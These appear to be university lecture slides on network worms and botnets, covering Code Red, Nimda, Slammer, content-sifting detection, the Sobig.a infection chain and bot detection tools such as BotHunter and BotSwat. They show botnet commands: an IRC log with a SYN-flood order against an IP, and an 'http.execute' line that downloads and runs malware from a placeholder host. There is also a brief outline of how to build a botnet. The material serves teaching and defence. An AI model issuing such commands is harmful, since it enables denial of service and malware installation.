Network Worms and Bots  

2

OutlineWorms

Worm examples and propagation methods Detection methods

Traffic patterns: EarlyBird Vulnerabilities: Generic Exploit Blocking

Disabling worms Generate signatures for network or host-based filters

Bots Structure and use of bots Recognizing bot propagation Recognizing bot operation

Network-based methods Host-based methods

3

WormA worm is self-replicating software designed to spread through the network

Typically, exploit security flaws in widely used services

Can cause enormous damage Launch DDOS attacks, install bot networks Access sensitive information Cause confusion by corrupting the sensitive information

Worm vs Virus vs Trojan horse A virus is code embedded in a file or program Viruses and Trojan horses rely on human intervention Worms are self-contained and may spread

autonomously

4

Cost of worm attacksMorris worm, 1988 Infected approximately 6,000 machines

10% of computers connected to the Internet cost ~ $10 million in downtime and cleanup

Code Red worm, July 16 2001 Direct descendant of Morris’ worm Infected more than 500,000 servers

Programmed to go into infinite sleep mode July 28 Caused ~ $2.6 Billion in damages,

Love Bug worm: $8.75 billionStatistics: Computer Economics Inc., Carlsbad,

California

5

Internet Worm (First major attack)

Released November 1988 Program spread through Digital, Sun

workstations Exploited Unix security vulnerabilities

VAX computers and SUN-3 workstations running versions 4.2 and 4.3 Berkeley UNIX code

Consequences No immediate damage from program itself Replication and threat of damage

Load on network, systems used in attack Many systems shut down to prevent further

attack

6

Some historical worms of noteWorm Dat

eDistinction

Morris 11/88

Used multiple vulnerabilities, propagate to “nearby” sys

ADM 5/98 Random scanning of IP address spaceRamen 1/01 Exploited three vulnerabilitiesLion 3/01 Stealthy, rootkit wormCheese 6/01 Vigilante worm that secured vulnerable systemsCode Red 7/01 First sig Windows worm; Completely memory

residentWalk 8/01 Recompiled source code locallyNimda 9/01 Windows worm: client-to-server, c-to-c, s-to-s, …Scalper 6/02 11 days after announcement of vulnerability;

peer-to-peer network of compromised systemsSlammer 1/03 Used a single UDP packet for explosive growthKienzle and Elder

7

Increasing propagation speedCode Red, July 2001

Affects Microsoft Index Server 2.0, Windows 2000 Indexing service on Windows NT 4.0. Windows 2000 that run IIS 4.0 and 5.0 Web servers

Exploits known buffer overflow in Idq.dll Vulnerable population (360,000 servers) infected in

14 hoursSQL Slammer, January 2003

Affects in Microsoft SQL 2000 Exploits known buffer overflow vulnerability

Server Resolution service vulnerability reported June 2002

Patched released in July 2002 Bulletin MS02-39 Vulnerable population infected in less than 10

minutes

8

Code RedInitial version released July 13, 2001 Sends its code as an HTTP request HTTP request exploits buffer overflow Malicious code is not stored in a file

Placed in memory and then run

When executed, Worm checks for the file C:\Notworm

If file exists, the worm thread goes into infinite sleep state

Creates new threads If the date is before the 20th of the month, the next 99

threads attempt to exploit more computers by targeting random IP addresses

9

Code Red of July 13 and July 19Initial release of July 13

1st through 20th month: Spread via random scan of 32-bit IP addr space

20th through end of each month: attack. Flooding attack against 198.137.240.91

(www.whitehouse.gov) Failure to seed random number generator linear growth

Revision released July 19, 2001. White House responds to threat of flooding attack by

changing the address of www.whitehouse.gov Causes Code Red to die for date ≥ 20th of the month. But: this time random number generator correctly seeded

Slides: Vern Paxson

10

Code Red 2

Released August 4, 2001.Comment in code: “Code Red 2.”

But in fact completely different code base.Payload: a root backdoor, resilient to reboots.Bug: crashes NT, only works on Windows 2000.Localized scanning: prefers nearby addresses.

Kills Code Red 1.Safety valve: programmed to die Oct 1, 2001.

Slides: Vern Paxson

11

Striving for Greater Virulence: Nimda

Released September 18, 2001.Multi-mode spreading: attack IIS servers via infected clients email itself to address book as a virus copy itself across open network shares modifying Web pages on infected servers w/

client exploit scanning for Code Red II backdoors (!)

worms form an ecosystem!Leaped across firewalls.

Slides: Vern Paxson

12

Code Red 2 kills off Code Red 1

Code Red 2 settles into weekly pattern

Nimda enters the ecosystem

Code Red 2 dies off as programmed

CR 1 returns thanksto bad clocks

Slides: Vern Paxson

13

How do worms propagate?Scanning worms

Worm chooses “random” addressCoordinated scanning

Different worm instances scan different addressesFlash worms

Assemble tree of vulnerable hosts in advance, propagate along tree

Not observed in the wild, yet Potential for 106 hosts in < 2 sec ! [Staniford]

Meta-server worm Ask server for hosts to infect (e.g., Google for “powered by

phpbb”)Topological worm:

Use information from infected hosts (web server logs, email address books, config files, SSH “known hosts”)

Contagion worm Propagate parasitically along with normally initiated

communication

14

Worm Detection and DefenseDetect via honeyfarms: collections of “honeypots”

Any outbound connection from honeyfarm = worm.(at least, that’s the theory)

Distill signature from inbound/outbound traffic. If honeypot covers N addresses, expect detection when

worm has infected 1/N of population.

Thwart via scan suppressors: network elements that block traffic from hosts that make failed connection attempts to too many other hosts

5 minutes to several weeks to write a signature Several hours or more for testing

15

Signature inferenceMonitor network and look for strings common to traffic with worm-like behavior Signatures can then be used for content

filtering

Slide: S Savage

16

Content siftingAssume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm (true today, not tomorrow...)Two consequences

Content Prevalence: W will be more common in traffic than other bitstrings of the same length

Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations

Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic

Slide: S Savage

17

Address Dispersion Table Sources Destinations Prevalence Table

The basic algorithmDetector in

networkA B

cnn.comC

DE

(Stefan Savage, UCSD *)

18

1 (B)1 (A)

Address Dispersion Table Sources Destinations

1 Prevalence Table

The basic algorithmDetector in

networkA B

cnn.comC

DE

(Stefan Savage, UCSD *)

191 (A)1 (C)1 (B)1 (A)

Address Dispersion Table Sources Destinations

11

Prevalence Table

The basic algorithmDetector in

networkA B

cnn.comC

DE

(Stefan Savage, UCSD *)

201 (A)1 (C)

2 (B,D)2 (A,B)

Address Dispersion Table Sources Destinations

12

Prevalence Table

The basic algorithmDetector in

networkA B

cnn.comC

DE

(Stefan Savage, UCSD *)

211 (A)1 (C)

3 (B,D,E)3 (A,B,D)

Address Dispersion Table Sources Destinations

13

Prevalence Table

The basic algorithmDetector in

networkA B

cnn.comC

DE

(Stefan Savage, UCSD *)

22

ChallengesComputation

To support a 1Gbps line rate we have 12us to process each packet, at 10Gbps 1.2us, at 40Gbps…

Dominated by memory references; state expensive Content sifting requires looking at every byte in a

packetState

On a fully-loaded 1Gbps link a naïve implementation can easily consume 100MB/sec for table

Computation/memory duality: on high-speed (ASIC) implementation, latency requirements may limit state to on-chip SRAM

(Stefan Savage, UCSD *)

23

Worm summaryWorm attacks Many ways for worms to propagate Propagation time is increasing Polymorphic worms, other barriers to

detectionDetect Traffic patterns: EarlyBird Watch attack: TaintCheck and Sting Look at vulnerabilities: Generic Exploit

BlockingDisable Generate worm signatures and use in

network or host-based filters

24

Botnet Collection of compromised hosts Spread like worms and viruses Once installed, respond to remote

commands Platform for many attacks Spam forwarding (70% of all spam?) Click fraud Keystroke logging Distributed denial of service attacks

Serious problem Top concern of banks, online merchants Vint Cerf: ¼ of hosts connected to Internet

25

What are botnets used for?capability ago DSNX evil G-SyS sd Spycreate port redirect √ √ √ √ √other proxy √download file from web √ √ √ √ √DNS resolution √ √ √UDP/ping floods √ √ √ √other DDoS floods √ √ √scan/spread √ √ √ √ √spam √visit URL √ √ √

Capabilities are exercised via remote commands.

26

Building a Bot Network

Attacker

Win XP

FreeBSD

Mac OS X

compromise attempt

compromise attempt

compromise attempt

compromise attempt Win XP

27

Building a Bot Network

Attacker

Win XPcompromised

FreeBSD

Mac OS X

compromise attempt

compromise attempt

compromise attempt

compromise attempt Win XPcompromised

install bot software

install bot software

28

Step 2

. . ./connect jade.va.us.dal.net/join #hacker. . .

Win XP. . ./connect jade.va.us.dal.net/join #hacker. . .

Win XP. . ./connect jade.va.us.dal.net/join #hacker. . .

Win XP

jade.va.dal.net

29

Step 3(12:59:27pm) -- A9-pcgbdv (A9-pcgbdv@140.134.36.124) has joined (#owned) Users : 1646

(12:59:27pm) (@PhaTTy) .ddos.synflood 216.209.82.62

(12:59:27pm) -- A6-bpxufrd (A6-bpxufrd@wp95-81.introweb.nl) has joined (#owned) Users : 1647

(12:59:27pm) -- A9-nzmpah (A9-nzmpah@140.122.200.221) has left IRC (Connection reset by peer)

(12:59:28pm) (@PhaTTy) .scan.enable DCOM

(12:59:28pm) -- A9-tzrkeasv (A9-tzrkeas@220.89.66.93) has joined (#owned) Users : 1650

3030

•Spam service•Rent-a-bot•Cash-out•Pump and dump•Botnet rental

31

Underground commerce Market in access to bots

Botherd: Collects and manages bots Access to proxies (“peas”) sold to spammers, often with

commercial-looking web interface Sample rates

Non-exclusive access to botnet: 10¢ per machine Exclusive access: 25¢. Payment via compromised account (eg PayPal) or cash to

dropboxIdentity Theft

Keystroke logging Complete identities available for $25 - $200+

Rates depend on financial situation of compromised person Include all info from PC files, plus all websites of interest

with passwords/account info used by PC owner At $200+, usually includes full credit report [Lloyd Taylor, Keynote Systems, SFBay InfraGard

Board ]

32

Sobig.a In ActionArrives as an email attachment Written in C++ Encrypted with Telock to slow analysis

User opens attachment, launching trojan Downloads file from a free Geocities

account Contains list of URLs pointing to second

stageFetches second-stage trojan Arbitrary executable file – could be anything For Sobig.a, second-stage trojan is Lala

33

Stage 2 – LalaCommunication Lala notifies a cgi script on a compromised

host Different versions of Lala have different

sites and cgi scripts, perhaps indicating tracking by author

Installation Lala installs a keylogger and password-

protected Lithium remote access trojan. Lala downloads Stage 3 trojan

Wingate proxy (commercial software)Cleanup Lala removes the Sobig.a trojan

34

Stage 3 – WingateWingate is a general-purpose port proxy server

555/TCP – RTSP 608/TCP – Remote Control Service

1180/TCP – SOCKS 1181/TCP – Telnet Proxy 1182/TCP – WWW Proxy 1183/TCP – FTP Proxy 1184/TCP – POP3 Proxy 1185/TCP – SMTP Server

Final state of compromised machine Complete remote control by Lithium client with

password “adm123” Complete logging of user’s keystrokes Usable for spam relay, http redirects Wingate Gatekeeper client can connect to 608/TCP,can log/change everything

35

Build Your Own BotnetPick a vector mechanism

IRC Channels: DCC Filesends, Website Adverts to Exploit Sites

Scan & Sploit: MSBlast Trojan: SoBig/BugBear/ActiveX Exploits

Choose a Payload Backdoors

Agobot, SubSeven, DeepThroat Most include mechanisms for DDoS, Self-spreading,

download/exec arbitrary code, password stealers.Do it

Compromise an IRC server, or use your own zombied machines

Configure Payload to connect to selected server Load encryption keys and codes Release through appropriate compromised systems Sit back and wait, or start on your next Botnet

[Lloyd Taylor, Keynote Systems, SFBay InfraGard Board ]

36

Bot detection methodsSignature-based (most AV products)Rule-based

Monitor outbound network connections (e.g. ZoneAlarm, BINDER)

Block certain ports (25, 6667, ...)Hybrid: content-based filtering

Match network packet contents to known command strings (keywords)

E.g. Gaobot ddos cmds: .ddos.httpfloodNetwork traffic monitoring

Wenke Lee, Phil Porras: Bot Hunter, … Correlate various NIDS alarms to identify “bot infection sequence”

GA Tech: Recognize traffic patterns associated with ddns-based rallying

Stuart Staniford, FireEye Detect port scanning to identify suspicious traffic Emulate host with taint tracking to identify exploit

37

What is botHunter?

What is botHunter?A Real Case StudyBehavior-based CorrelationArchitectural Overview

IntroductionApproaches to Privacy-Preserving Correlation

A Cyber-TA Distributed Correlation Example – botHunter

botHunter SensorsCorrelation FrameworkExample botHunter OutputCyber-TA Integration

BotHunter: passive bot detection

Snort-based sensor suite for malware event detection

inbound scan detection remote to local exploit detection anomaly detection system for exploits over key TCP

protocols Botnet specific egg download banners, Victim-to-C&C-based communications exchanges

particularly for IRC bot protocolsEvent correlator

combines information from sensors to recognize bots that infect and coordinate with your internal network assets

Submits “bot-detection profiles” to the Cyber-TA repository infrastructure

38

Botnets network traffic patterns

Unique characteristic: “rallying” Bots spread like worms and trojans Payloads may be common backdoors Centralized control of botnet is characteristic feature

Georgia Tech idea: DNS Bots installed at network edge IP addresses may vary, use Dynamic DNS Bots talk to controller, make DDNS lookup

Pattern of DDNS lookup is easy to spot for common botnets!

David Dagon, Sanjeev Dwivedi, Robert Edmonds, Julian Grizzard,

Wenke Lee, Richard Lipton, Merrick Furst; Cliff Zou (U Mass)

39

BotSwatHost-based bot detectionBased on idea of remote control commands

40

What does remote control look like?

Invoke system calls: connect, network send and recv, create file, write

file, …On arguments received over the network:

IP to connect to, object to request, file name, …Botswat premise

We can distinguish the behavior of bots from that of innocuous processes via detecting “remote control”

We can approximate “remote control” as “using data received over the network in a system call argument”

http.execute <URL> <local_path>

41

Windows XP

agobot

NIC

http.execute www.badguy.com/malware.exe C:\WIN\bad.exe

connect(…,www.badguy.com,…)

send( …,“…GET /malware.exe…”,…)

fcreate(…,“C:\WIN\malware.exe”,…)

1

2

43

6

7

5

8